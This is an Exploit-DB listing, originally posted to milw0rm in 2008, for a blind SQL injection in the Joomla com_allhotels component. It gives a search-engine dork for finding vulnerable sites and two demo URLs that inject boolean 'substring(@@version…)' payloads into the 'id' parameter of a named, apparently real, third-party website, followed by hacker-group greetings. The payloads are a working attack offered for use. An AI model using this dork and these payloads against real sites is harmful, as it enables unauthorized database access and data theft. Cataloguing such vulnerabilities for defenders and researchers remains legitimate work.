Joomla! Component com_allhotels - Blind SQL Injection

EDB-ID:

7568

CVE:

2008-5875 2008-5874

EDB Verified:

Author:

Hussin X

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-12-23

Vulnerable App:

Joomla Component com_allhotels (id)  Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

___________________________________

script  : http://www.joomlahbs.com/  &  http://www.leveltensolutions.net/spa/

DorK : inurl:index.php?option=com_allhotels

Demo :
_______


http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5

http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=4
____________________________( Greetz )_________________________________
|
|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
|
|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
|_____________________________________________________________________

 _____   ____   __   __     _       ____        ____    ____
|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |
  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___
  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|

# milw0rm.com [2008-12-23]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services